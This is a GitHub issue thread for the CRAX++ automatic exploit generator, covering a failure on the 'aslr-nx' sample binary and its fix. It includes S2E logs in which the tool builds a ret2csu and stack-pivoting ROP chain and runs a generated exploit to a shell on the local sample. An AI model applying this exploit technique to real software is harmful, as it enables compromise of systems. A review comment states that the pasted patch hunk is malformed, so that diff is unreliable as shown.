SQLab/CRAXplusplus

CRAX++ exits immediately after executing aslr-nx sample binary without generating an exploit

keis94 opened this issue · 3 comments

Description

CRAX++ exits immediately after executing the aslr-nx sample binary introduced in BUILD.md, without producing an exploit for it.

Any clues on how to get it working properly?

./launch-crax.sh

Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/keis/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-0"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: BasicStackPivoting
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
2 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7f420400a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
CRAX: Cannot resolve gadget: pop rax ; ret
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: chmod
11 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f93c1f3a000 elf_entry=0x7f93c1f3a000 interp_load_addr=0x7f93c1f3a000
11 [State 0] CRAX: onProcessLoad: sym_stdin
11 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f4a47ae7000 elf_entry=0x7f4a47ae7000 interp_load_addr=0x7f4a47ae7000
11 [State 0] BaseInstructions: Inserted symbolic data @0x55cb5f982040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x55cb5f97f280
12 [State 0] BaseInstructions: Killing state 0
12 [State 0] Terminating state: State was terminated by opcode
            message: "program terminated"
            status: 0x0
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 612401 (/home/keis/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

How To Reproduce

Follow BUILD.md instructions and apply some workarounds.

  • Use s2ecmd get and s2ecmd put instead of s2eget and s2eput in bootstrap.sh
  • Fix libs2eplugins.patch to make it applicable to the latest S2E/s2e
    diff --git a/patches/libs2eplugins.patch b/patches/libs2eplugins.patch
    index 637874c..6a869c6 100644
    --- a/patches/libs2eplugins.patch
    +++ b/patches/libs2eplugins.patch
    @@ -68,10 +68,8 @@ index e3b2d37..973c267 100644
          # Core plugins
          s2e/Plugins/Core/BaseInstructions.cpp
          s2e/Plugins/Core/HostFiles.cpp
    -@@ -163,7 +196,7 @@ set(WERROR_FLAGS "-Werror -Wno-zero-length-array -Wno-c99-extensions          \
    -                   -Wno-zero-length-array")
    -
    - set(COMMON_FLAGS "-D__STDC_FORMAT_MACROS -D_GNU_SOURCE -DNEED_CPU_H  -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -DTARGET_PHYS_ADDR_BITS=64")
    +@@ -165,5 +198,5 @@ set(COMMON_FLAGS "-D__STDC_FORMAT_MACROS -D_GNU_SOURCE -DNEED_CPU_H  -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -DTARGET_PHYS_ADDR_BITS=64")
    + set(COMMON_FLAGS "${COMMON_FLAGS} -DLIBS2E_PLUGINS")
     -set(COMMON_FLAGS "${COMMON_FLAGS} -Wall -fPIC -fno-strict-aliasing -fexceptions -std=c++17")
     +set(COMMON_FLAGS "${COMMON_FLAGS} -Wall -fPIC -fno-strict-aliasing -fexceptions -fsized-deallocation -std=c++17")
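Review bot: as pasted, this hunk is one context line short of its `@@ -68,10 +68,8 @@` header (nine old and seven new lines are shown where ten and eight are declared), so `git apply` or `patch` will reject it verbatim; the trailing context line was most likely lost when the diff was pasted into the issue, so regenerate it with `git diff` and paste it whole or attach the file. The rewritten inner header `@@ -165,5 +198,5 @@` also hard-codes line numbers for one particular upstream CMakeLists.txt, so record the S2E commit this was verified against, since "the latest S2E/s2e" is a moving target.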
  • Use the debian-11.3-x86_64 image instead of debian-9.2.1-x86_64
    • fix baseDirs in proxies/sym_stdin/s2e-config.template.lua accordingly
  • Build sym_stdin in debian:11.3 container image

Environment

  • host OS: Ubuntu 20.04.05

I can reproduce this:

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [22:35]
> ./launch-crax.sh
Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/aesophor/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-3"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: AdvancedStackPivoting
CRAX: Creating technique: GotLeakLibc
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
1 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7ff7b000a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: chmod
8 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f1cef2bf000 elf_entry=0x7f1cef2bf000 interp_load_addr=0x7f1cef2bf000
8 [State 0] CRAX: onProcessLoad: sym_stdin
8 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7fe9d2222000 elf_entry=0x7fe9d2222000 interp_load_addr=0x7fe9d2222000
8 [State 0] BaseInstructions: Inserted symbolic data @0x565174afa040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x565174af7364
8 [State 0] BaseInstructions: Killing state 0
8 [State 0] Terminating state: State was terminated by opcode
            message: "program terminated"
            status: 0x0
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 703803 (/home/aesophor/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

Even instruction/syscall hooks are broken with the latest s2e, lol...

cc @LJP-TW Are you by any chance still working on CRAX++? If yes, have you encountered this problem recently?

Okay, I've found the problem: fork()/exec() failed because the target executable was missing the x permission.

Please edit bootstrap.sh and add this line.

prepare_target "${TARGET_PATH}"
prepare_target "./target"   # <-- add this line

I ran CRAX against aslr-nx and thankfully it still worked (lol).
Some other techniques might not work if you use the debian 11 guest image.

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./launch-crax.sh
Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/aesophor/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-29"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: BasicStackPivoting
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
1 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7f143400a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: chmod
8 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7ff2719f7000 elf_entry=0x7ff2719f7000 interp_load_addr=0x7ff2719f7000
9 [State 0] CRAX: onProcessLoad: chmod
9 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f94ae895000 elf_entry=0x7f94ae895000 interp_load_addr=0x7f94ae895000
9 [State 0] CRAX: onProcessLoad: sym_stdin
9 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f3858472000 elf_entry=0x7f3858472000 interp_load_addr=0x7f3858472000
9 [State 0] BaseInstructions: Inserted symbolic data @0x561f2e70f040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x561f2e70c364
9 [State 0] CRAX: onProcessLoad: target
9 [State 0] BaseInstructions: Message from guest (0xffffc900004a7a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7efd14e46000 elf_entry=0x7efd14e46000 interp_load_addr=0x7efd14e46000
9 [State 0] CRAX: onModuleLoad: ld-linux-x86-64.so.2
9 [State 0] ModuleExecutionDetector: loading id mod_0
9 [State 0] CRAX: onModuleLoad: target
9 [State 0] CRAX: syscall: 0xc (0x0, 0x7efd14e68ea2, 0x4d, 0x7efd14e68ea2, 0x7efd14e70e88, 0x1c)
9 [State 0] CRAX: syscall: 0x15 (0x7efd14e6ba40, 0x4, 0x7efd14e461c8, 0x8, 0x0, 0x0)
9 [State 0] CRAX: syscall: 0x101 (0xffffff9c, 0x7efd14e68be7, 0x80000, 0x0, 0x80000, 0x7efd14e68be7)
9 [State 0] CRAX: syscall: 0x5 (0x3, 0x7ffd139c5c40, 0x7ffd139c5c40, 0x0, 0x1, 0x7efd14e68be7)
9 [State 0] CRAX: syscall: 0x9 (0x0, 0x6746, 0x1, 0x2, 0x3, 0x0)
9 [State 0] CRAX: syscall: 0x3 (0x3, 0x6746, 0x1, 0x2, 0x3, 0x0)
10 [State 0] CRAX: syscall: 0x101 (0xffffff9c, 0x7efd14e72e00, 0x80000, 0x0, 0x80000, 0x7efd14e72e00)
10 [State 0] CRAX: syscall: 0x0 (0x3, 0x7ffd139c5de8, 0x340, 0x0, 0x80000, 0x7efd14e72e00)
10 [State 0] CRAX: syscall: 0x5 (0x3, 0x7ffd139c5c90, 0x7ffd139c5c90, 0x0, 0x1, 0x7efd14e72180)
10 [State 0] CRAX: syscall: 0x9 (0x0, 0x2000, 0x3, 0x22, 0xffffffff, 0x0)
10 [State 0] CRAX: syscall: 0x9 (0x0, 0x1d4680, 0x1, 0x802, 0x3, 0x0)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14c8a000, 0x15a000, 0x5, 0x812, 0x3, 0x22000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14de4000, 0x4f000, 0x1, 0x812, 0x3, 0x17c000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14e33000, 0x6000, 0x3, 0x812, 0x3, 0x1ca000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14e39000, 0x3680, 0x3, 0x32, 0xffffffff, 0x0)
10 [State 0] CRAX: syscall: 0x3 (0x3, 0x29, 0x0, 0x70000022, 0x6fffffff, 0xeffffef5)
10 [State 0] CRAX: syscall: 0x9e (0x1002, 0x7efd14e3e540, 0xffff8102eb1c11a0, 0x1, 0x7efd14e3e540, 0x90)
13 [State 0] CRAX: syscall: 0xa (0x7efd14e33000, 0x4000, 0x1, 0x468, 0x7efd14d02ef0, 0x7efd14e465e0)
14 [State 0] CRAX: syscall: 0xa (0x403000, 0x1000, 0x1, 0x48, 0x400588, 0x7efd14c72778)
14 [State 0] CRAX: syscall: 0xa (0x7efd14e70000, 0x1000, 0x1, 0x7efd14e70f78, 0x0, 0x7efd14c6d240)
14 [State 0] CRAX: syscall: 0xb (0x7efd14e3f000, 0x6746, 0x19a900000000, 0x7efd14e70f78, 0x0, 0x7efd14c6d240)
14 [State 0] CRAX: syscall: 0x1 (0x1, 0x7ffd139c4410, 0xc, 0x402004, 0x0, 0xc)
overflow me:14 [State 0] CRAX: libc base address: 0x7efd14c6ba30
14 [State 0] CRAX: syscall: 0x0 (0x0, 0x7ffd139c6a90, 0x400, 0xfffffffffffff4bd, 0x0, 0xc)
14 [State 0] CRAX: Detected symbolic RIP: 0x4141414141414141, original value was: 0x4011cd
14 [State 0] CRAX: Dumping CPU registers...
---------- [REGISTERS] ----------
RAX     0x0
RCX     0x7efd14d5478e
RDX     0x400
RBX     0x0
RSP     0x7ffd139c6ac0
RBP     (symbolic)
RSI     0x7ffd139c6a90
RDI     0x0
R8      0x0
R9      0xc
R10     0xfffffffffffff4bd
R11     0x246
R12     0x401090
R13     0x0
R14     0x0
R15     0x0
RIP     (symbolic)
14 [State 0] CRAX: Dumping memory map...
--------------- [VMMAP] ---------------
Start           End             Perm    Module
0x400000        0x401000        r--     target
0x401000        0x402000        r-x     target
0x402000        0x404000        r--     target
0x404000        0x405000        rw-     target
0x7efd14c68000  0x7efd14c8a000  r--     libc.so.6
0x7efd14c8a000  0x7efd14de4000  r-x     libc.so.6
0x7efd14de4000  0x7efd14e37000  r--     libc.so.6
0x7efd14e37000  0x7efd14e3f000  rw-     libc.so.6
0x7efd14e46000  0x7efd14e47000  r--     ld-linux-x86-64.so.2
0x7efd14e47000  0x7efd14e67000  r-x     ld-linux-x86-64.so.2
0x7efd14e67000  0x7efd14e6f000  r--     ld-linux-x86-64.so.2
0x7efd14e70000  0x7efd14e71000  r--     ld-linux-x86-64.so.2
0x7efd14e71000  0x7efd14e72000  rw-     ld-linux-x86-64.so.2
0x7ffd139c3000  0x7ffd139c7000  rw-     [stack]
14 [State 0] CRAX: No more dynamic ROP constraints to apply.
14 [State 0] CRAX: Dumping IOStates: [o, i1024]
16 [State 0] CRAX: Cannot resolve gadget: pop rax ; ret
16 [State 0] CRAX: Ret2syscall is still running, please wait...
16 [State 0] CRAX: Using core generator from module: IOStates
16 [State 0] CRAX: Initializing technique: Ret2csu
16 [State 0] CRAX: Found __libc_csu_init() at 0x4011d0
16 [State 0] CRAX: Initializing technique: BasicStackPivoting
16 [State 0] CRAX: Initializing technique: Ret2syscall
16 [State 0] CRAX: Adding exploit constraints...
16 [State 0] CRAX: Constraining RBP to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining RIP to p64(target_base + __libc_csu_init_gadget1) (concretized=0x401226)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac0 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad0 to p64(0x1) (concretized=0x1)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae0 to p64(target_base + pivot_dest) (concretized=0x404840)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae8 to p64(0x400) (concretized=0x400)
16 [State 0] CRAX: Constraining 0x7ffd139c6af0 to p64(target_base + __libc_csu_init_call_target) (concretized=0x402e48)
16 [State 0] CRAX: Constraining 0x7ffd139c6af8 to p64(target_base + __libc_csu_init_gadget2) (concretized=0x401210)
16 [State 0] CRAX: Constraining 0x7ffd139c6b00 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b08 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b10 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b18 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b20 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b28 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b30 to p64(0x4141414141414141) (concretized=0x4141414141414141)
17 [State 0] CRAX: Constraining 0x7ffd139c6b38 to p64(target_base + target.sym['read']) (concretized=0x401070)
17 [State 0] CRAX: Constraining 0x7ffd139c6b40 to p64(target_base + target_pop_rbp_ret) (concretized=0x40115d)
17 [State 0] CRAX: Constraining 0x7ffd139c6b48 to p64(target_base + pivot_dest) (concretized=0x404840)
17 [State 0] CRAX: Constraining 0x7ffd139c6b50 to p64(target_base + target_leave_ret) (concretized=0x4011cc)
17 [State 0] CRAX: Switching to direct mode...
17 [State 0] CRAX: Generated exploit script: exploit_0.py
17 [State 0] Terminating state: End of exploit generation
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 743692 (/home/aesophor/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./exploit_0.py
zsh: permission denied: ./exploit_0.py

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> chmod u+x ./exploit_0.py

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./exploit_0.py
[+] Starting local process './ld-2.24.so': pid 743870
[*] Switching to interactive mode
$ ls
